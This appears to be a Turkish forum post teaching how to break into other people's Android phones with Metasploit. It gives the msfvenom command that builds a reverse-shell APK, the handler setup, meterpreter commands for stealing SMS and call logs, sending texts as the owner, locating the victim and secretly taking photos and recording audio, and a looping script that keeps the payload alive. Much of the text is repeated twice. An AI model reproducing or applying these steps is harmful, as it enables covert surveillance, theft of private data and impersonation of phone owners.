View hidden content is available for registered users!
Öncelikle Selamun Aleyküm Arkadaşlar Ben
View hidden content is available for registered users!
Red Samuray
Bugün Sizlere Kali Linux Metasploit Yardımı İle Android Cihazlara Sızmayı Öğreteceğim.
NOT: Kötü Amaçlar İçin Kullanmayınız. Sorumluluk Kabul Etmiyorum.
Öncelikle Uçbirimimizi Açıyoruz. Komut Satıra Aşağıdakini Yazıyoruz.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 R > Masaüstü/test.apk
NOT: Eğer İngilizce İse Desktop/ Yazıyoruz, LHOST Kendi İP Adresinizi test.apk yerine ise program adını Yazıyoruz. IP Adresi Öğrenmek İçin İse ifconfig Yazıyoruz.
msfconsole Diyerek MSFCONSOLE'yi Çalıştırıyoruz.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (Kendi IP Adresiniz)
set LPORT 4444
exploit
3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarak exploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
Karşı Taraf Programı İndirim Çalıştırdığı Zaman Size Bilgiler Gelcek ve Komut Satırında
meterpreter Yazacak
“help”
komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.
heck_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz
Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin
“record_mic -h”
yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
#!/bin/bash
while true
do am start — user 0 -a android.intent.action.MAIN -n com.****sploit.stage/.MainActivity
sleep 20
done
Tüm bunları yaptıktan sonra terminale shell yazın ve dosyayı yüklediğiniz konuma giderek
“sh dosyaismi.sh”
Bugün Sizlere Kali Linux Metasploit Yardımı İle Android Cihazlara Sızmayı Öğreteceğim.
NOT: Kötü Amaçlar İçin Kullanmayınız. Sorumluluk Kabul Etmiyorum.
Öncelikle Uçbirimimizi Açıyoruz. Komut Satıra Aşağıdakini Yazıyoruz.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 R > Masaüstü/test.apk
NOT: Eğer İngilizce İse Desktop/ Yazıyoruz, LHOST Kendi İP Adresinizi test.apk yerine ise program adını Yazıyoruz. IP Adresi Öğrenmek İçin İse ifconfig Yazıyoruz.
msfconsole Diyerek MSFCONSOLE'yi Çalıştırıyoruz.
Daha sonra sırası ile aşağıdaki komutları giriyoruz.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (Kendi IP Adresiniz)
set LPORT 4444
exploit
3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarak exploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
Karşı Taraf Programı İndirim Çalıştırdığı Zaman Size Bilgiler Gelcek ve Komut Satırında
meterpreter Yazacak
“help”
komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.
heck_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz
Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin
“record_mic -h”
yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.
Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.
#!/bin/bash
while true
do am start — user 0 -a android.intent.action.MAIN -n com.****sploit.stage/.MainActivity
sleep 20
done
Tüm bunları yaptıktan sonra terminale shell yazın ve dosyayı yüklediğiniz konuma giderek
“sh dosyaismi.sh”
yazarak çalıştırın. Bundan sonra uygulama kapansa da siz istediğiniz işlemleri yapmaya devam edebilirsiniz.BU KADARDI 1 TANE BEĞENİYİ ÇOK GÖRMEYİN
